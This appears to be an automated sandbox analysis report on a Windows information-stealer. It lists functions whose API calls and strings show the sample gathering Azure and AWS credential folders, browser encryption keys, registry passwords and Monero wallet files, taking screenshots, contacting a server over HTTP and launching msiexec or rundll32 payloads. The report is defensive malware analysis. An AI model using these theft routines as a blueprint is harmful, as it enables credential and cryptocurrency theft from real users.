                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID: $`
                          • API String ID: 2001356338-103900699
                          • Opcode ID: 10a8d96b70d604dbc9eb4b82f5c727769fa17bed535474775621c8936eea16f7
                          • Instruction ID: b316746347b0bb88d032974e7f72cb4a15a3938602319e31ddb37e3f05f3254a
                          • Opcode Fuzzy Hash: 10a8d96b70d604dbc9eb4b82f5c727769fa17bed535474775621c8936eea16f7
                          • Instruction Fuzzy Hash: DAC196B690021D9BCF15EF60DC89FEA7778BF64304F004599F50AAB241DB70AA85DF91
                          Function 00394D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00394DCD
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                            • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                          • lstrcat.KERNEL32(?,00000000), ref: 00394E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00394E59
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00394EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00394EE5
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949B0
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A08D2), ref: 003949C5
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 003949E2
                            • Part of subcall function 00394910: PathMatchSpecA.SHLWAPI(?,?), ref: 00394A1E
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,00E3EA68), ref: 00394A4A
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FF8), ref: 00394A5C
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A70
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,003A0FFC), ref: 00394A82
                            • Part of subcall function 00394910: lstrcat.KERNEL32(?,?), ref: 00394A96
                            • Part of subcall function 00394910: CopyFileA.KERNEL32(?,?,00000001), ref: 00394AAC
                            • Part of subcall function 00394910: DeleteFileA.KERNEL32(?), ref: 00394B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                          • Instruction ID: 493463e42798e4a39787ae4a3b0a2ce115735d518e0fe9308e637d7a47357c43
                          • Opcode Fuzzy Hash: ec14198ede539764cc98dfbc9b060d6e93c8abc0c312f1965f64104387dca8d3
                          • Instruction Fuzzy Hash: C241D6BA95030867DB15F760EC47FEE3738AB65704F004494B245AA0C1FEB45BC98B92
                          Function 00392E30 Relevance: 21.5, APIs: 3, Strings: 9, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 003931C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0039335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 003934EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe$`
                          • API String ID: 2507796910-1874571557
                          • Opcode ID: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                          • Instruction ID: ac345bdbf4afad4efea6b61427706070990cdd9e31017373fb5333ca9d24c139
                          • Opcode Fuzzy Hash: fccde21924cd6ee9074d54be6308dd41d875e42e703b5f24d365a2c2401768e6
                          • Instruction Fuzzy Hash: 0C12FF718145189ADF1AFBA0DC92FEEB778AF14300F504259F5066A191EF342B4ADFE2
                          Function 00394280 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 003942EC
                          • lstrcat.KERNEL32(?,00E3E470), ref: 0039430B
                          • lstrcat.KERNEL32(?,?), ref: 0039431F
                          • lstrcat.KERNEL32(?,00E3CFF0), ref: 00394333
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                            • Part of subcall function 00389CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 003993C0: GlobalAlloc.KERNEL32(00000000,003943DD,003943DD), ref: 003993D3
                          • StrStrA.SHLWAPI(?,00E3E4A0), ref: 003943F3
                          • GlobalFree.KERNEL32(?), ref: 00394512
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 003944A3
                          • StrCmpCA.SHLWAPI(?,003A08D1), ref: 003944C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003944D2
                          • lstrcat.KERNEL32(00000000,?), ref: 003944E5
                          • lstrcat.KERNEL32(00000000,003A0FB8), ref: 003944F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID: p
                          • API String ID: 3541710228-2678736219
                          • Opcode ID: 4ccf44c73058f4b87112b21f9a4298d2740853347b15df38da5300169a47da08
                          • Instruction ID: 907f2bf0e7df2415991ad31559b94adcfd08173870d8daf31b389db4583efa3c
                          • Opcode Fuzzy Hash: 4ccf44c73058f4b87112b21f9a4298d2740853347b15df38da5300169a47da08
                          • Instruction Fuzzy Hash: C07166B6900608ABCF15FBE0DC85FEE777DAB98304F044598F605A7181EA35DB49CB91
                          Function 00399010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0039906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                          • Instruction ID: b404a8fc6ae3ca88664d2b0bbf89bb520614bb79288eb632cfdf71adab80f500
                          • Opcode Fuzzy Hash: 424950658fedeba7f591bf3062e4f3292614c79fe0ccab97a9bf839e2e1f71a7
                          • Instruction Fuzzy Hash: A371DA75910608AFDB04EBE4DC89FEEBBB8FB58704F108508F516AB290DB34A945DB61
                          Function 003952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                            • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                            • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                          • lstrlen.KERNEL32(00000000), ref: 0039532F
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                          • lstrlen.KERNEL32(00000000), ref: 00395383
                          • lstrlen.KERNEL32(00000000), ref: 003953AE
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: f4707985c637b060af7a24b195f0e6474022f8b2bf44e3fabe87b810d184f07d
                          • Instruction ID: 1cb66829debcc476dde847120aca26fd12742872116859a1fa3540db3582b727
                          • Opcode Fuzzy Hash: f4707985c637b060af7a24b195f0e6474022f8b2bf44e3fabe87b810d184f07d
                          • Instruction Fuzzy Hash: 21510C309246489BDF16FFA0CD96AED7B79EF11300F504118F40A6E592EF346B46DBA2
                          Function 00381310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 003812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                            • Part of subcall function 003812A0: RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                            • Part of subcall function 003812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                            • Part of subcall function 003812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                            • Part of subcall function 003812A0: RegCloseKey.ADVAPI32(?), ref: 003812FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0038134F
                          • lstrlen.KERNEL32(?), ref: 0038135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00381377
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00381465
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 003814EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 8967d7a653acc24572147b584719b3a9dfa0f8da7c4f2527b175ae15e49a34e4
                          • Instruction ID: a5394581503e42e253d2a7abc58ed085fae339561472caca1a9255299f73ea92
                          • Opcode Fuzzy Hash: 8967d7a653acc24572147b584719b3a9dfa0f8da7c4f2527b175ae15e49a34e4
                          • Instruction Fuzzy Hash: C75132B19506195BCF16FB60DC92FED777CAF54300F4042D8B60AA6081EF706B89CBA6
                          Function 003875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 003872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0038733A
                            • Part of subcall function 003872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003873B1
                            • Part of subcall function 003872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0038740D
                            • Part of subcall function 003872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00387452
                            • Part of subcall function 003872D0: HeapFree.KERNEL32(00000000), ref: 00387459
                          • lstrcat.KERNEL32(00000000,003A17FC), ref: 00387606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00387648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0038765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0038768F
                          • lstrcat.KERNEL32(00000000,003A1804), ref: 003876A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003876D3
                          • lstrcat.KERNEL32(00000000,003A1808), ref: 003876ED
                          • task.LIBCPMTD ref: 003876FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                          • Instruction ID: d3221e06edda73b4964fd788a0862bea70589f4d1d9d41fe5f51bad368f52e9f
                          • Opcode Fuzzy Hash: c4ac5ddd66e408eb7f435b15f9d3a53690f35e557c8e3120040223d4dbf1c36f
                          • Instruction Fuzzy Hash: 7F312972D00609DFCB06FBA4DC99DEE7B79AB54305B244158F102AB290DB34A94ADB61
                          Function 00398100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3E1E8,00000000,?,003A0E2C,00000000,?,00000000), ref: 00398130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00398137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00398158
                          • __aulldiv.LIBCMT ref: 00398172
                          • __aulldiv.LIBCMT ref: 00398180
                          • wsprintfA.USER32 ref: 003981AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
